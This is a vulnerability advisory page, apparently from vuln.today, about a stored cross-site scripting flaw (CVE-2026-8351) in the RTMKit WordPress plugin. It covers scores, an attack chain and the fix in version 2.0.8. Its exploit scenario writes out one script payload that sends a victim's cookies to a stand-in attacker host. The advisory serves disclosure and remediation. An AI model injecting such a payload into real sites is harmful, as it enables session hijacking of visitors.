Skip to main content

RTMKit WordPress Plugin CVE-2026-8351

| EUVDEUVD-2026-41512 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-03 Wordfence GHSA-cvjh-fmg7-m8wm
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

Stored XSS still requires a victim to navigate to the injected page (UI:R); PR:L reflects mandatory contributor account; S:C correct as payload executes in victim browser principal.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 03, 2026 - 08:22 vuln.today
CVE Published
Jul 03, 2026 - 06:50 nvd
MEDIUM 6.4

DescriptionCVE.org

The RTMKit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Advanced Heading widget's 'Background Text' parameter in versions up to, and including, 2.0.7 This is due to insufficient output escaping on the 'background_text_heading' setting in the render() function, which concatenates the value directly into an HTML attribute without applying esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in RTMKit (rometheme-for-elementor) versions up to and including 2.0.7 allows authenticated contributors to persist arbitrary JavaScript in WordPress pages via the Advanced Heading widget's 'Background Text' field. The root cause is the direct concatenation of the user-controlled background_text_heading setting into an HTML attribute inside the widget's render() function without applying WordPress's esc_attr() sanitization, reported by Wordfence. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Obtain or register WordPress contributor account
Delivery
Open Advanced Heading widget editor in Elementor
Exploit
Inject XSS payload into 'Background Text' field
Execution
Payload persisted to database without escaping
Persist
Victim user loads the injected page
Impact
Malicious script executes in victim's browser context

Vulnerability AssessmentAI

Exploitation Exploitation requires a WordPress account with contributor-level access or higher (CVSS PR:L), which an attacker must possess or acquire before injection is possible - unauthenticated visitors cannot plant the payload. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD-assigned CVSS 3.1 score of 6.4 (Medium) uses vector AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker obtains a contributor-level WordPress account on a target site running RTMKit ≤ 2.0.7 - either by registering on an open-registration site or by compromising existing credentials. They edit or create a page using the Advanced Heading Elementor widget and enter a JavaScript payload such as `"><script>document.location='https://attacker.example/steal?c='+document.cookie</script>` into the 'Background Text' field; this value is stored unsanitized in the database. …
Remediation Update the RTMKit (rometheme-for-elementor) plugin to version 2.0.8 or later, which addresses the missing `esc_attr()` call in the Advanced Heading widget's `render()` function; the fix is evidenced by the trac changeset at https://plugins.trac.wordpress.org/changeset?old_path=%2Frometheme-for-elementor/tags/2.0.7&new_path=%2Frometheme-for-elementor/tags/2.0.8. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-8351 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy